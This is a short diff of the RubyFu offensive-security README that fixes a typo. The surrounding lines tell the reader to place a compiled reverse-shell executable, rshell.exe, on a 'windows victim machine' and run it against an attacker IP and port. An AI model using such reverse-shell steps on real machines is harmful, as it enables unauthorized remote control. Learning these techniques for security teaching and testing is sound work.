rubyfu/RubyFu/module_0x2__system_kungfu/README.md

 === Finished building rshell.exe (2756229 bytes)
 ```

 In the same directory, you'll find an exe file rshell.exe.
-Put it on the windows victim machine which dosen't have ruby installed and run it
+Put it on the windows victim machine which doesn't have ruby installed and run it

 ```
 rshell.exe 192.168.0.14 9911